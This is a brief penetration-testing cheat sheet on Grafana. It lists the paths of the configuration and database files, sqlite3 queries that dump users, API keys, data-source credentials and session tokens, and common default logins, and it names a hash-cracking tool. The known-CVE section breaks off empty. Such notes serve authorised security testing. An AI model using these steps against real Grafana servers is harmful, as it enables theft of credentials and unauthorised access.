Skip to content

Pentesting Grafana

Source: https://rootxsushant.medium.com/a-comprehensive-guide-for-pentesting-grafana-cfa09b2f1243

Grafana is an open source interactive data-visualization platform, developed by Grafana Labs, which allows users to see their data via charts and graphs that are unified into one dashboard (or multiple dashboards!) for easier interpretation and understanding. You can also query and set alerts on your information and metrics from wherever that information is stored, whether that’s traditional server environments, Kubernetes clusters, or various cloud services, etc.

Important grafana files and directories

1
2
/var/lib/grafana/grafana.db
/etc/grafana/grafana.ini

grafana.db

Save to your local machine.

If you have SQLite installed, just run:

1
sqlite3 grafana.db

Once inside the shell:

1
2
3
4
5
6
.tables             -- list all tables
.schema             -- print schema
SELECT * FROM user;         -- dump all users
SELECT * FROM api_key;      -- list API keys
SELECT * FROM data_source;  -- view data sources (often contains creds)
SELECT * FROM user_auth_token; -- session tokens

Default Credentials

Grafana, like many other platforms, often ships with preset login credentials that administrators may forget to update.

1
2
admin:admin
admin:prom-operator

Tools

grafana2hashcat: Original | My fork

Well-known CVEs

CVE-2020–13379 :

Last update: 2025-12-14
Created: July 14, 2025 16:39:18